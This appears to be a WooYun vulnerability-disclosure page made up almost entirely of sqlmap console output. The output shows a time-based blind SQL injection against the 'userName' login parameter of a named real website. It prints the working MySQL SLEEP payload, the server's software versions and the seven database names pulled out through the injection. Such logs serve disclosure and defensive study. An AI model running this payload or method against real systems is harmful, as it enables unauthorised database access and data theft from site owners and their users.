WooYun.org

POST parameter 'userName' is vulnerable. Do you want to keep testing the others
(if any)? [y/N] n
sqlmap identified the following injection points with a total of 105 HTTP(s) req
uests:
---
Parameter: userName (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userName=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))XvRr) AND 'qLn
n'='qLnn&password=admin&verifyLogin=245141
---
[21:51:49] [INFO] the back-end DBMS is MySQL
web application technology: Nginx, PHP 5.4.4
back-end DBMS: MySQL 5.0.12
[21:51:49] [INFO] fetching database names
[21:51:49] [INFO] fetching number of databases
[21:51:49] [INFO] retrieved:
[21:51:49] [WARNING] it is very important not to stress the network adapter duri
ng usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] y
7
[21:52:14] [INFO] retrieved:
[21:52:24] [INFO] adjusting time delay to 2 seconds due to good response times
inform
[21:54:26] [ERROR] invalid character detected. retrying..
[21:54:26] [WARNING] increasing time delay to 3 seconds
[21:54:43] [ERROR] invalid character detected. retrying..
[21:54:43] [WARNING] increasing time delay to 4 seconds
ation_schema
[22:01:10] [INFO] retrieved: backup
[22:04:19] [INFO] retrieved: import
[22:08:12] [INFO] retrieved: linksys
[22:12:15] [INFO] retrieved: mysql
[22:15:05] [INFO] retrieved: test
[22:17:28] [INFO] retrieved: unknow_back
available databases [7]:
[*] backup
[*] import
[*] information_schema
[*] linksys
[*] mysql
[*] test
[*] unknow_back
[22:23:46] [INFO] fetched data logged to text files under 'C:\Users\Administrato
r\.sqlmap\output\www.1510cloud.com'
[*] shutting down at 22:23:46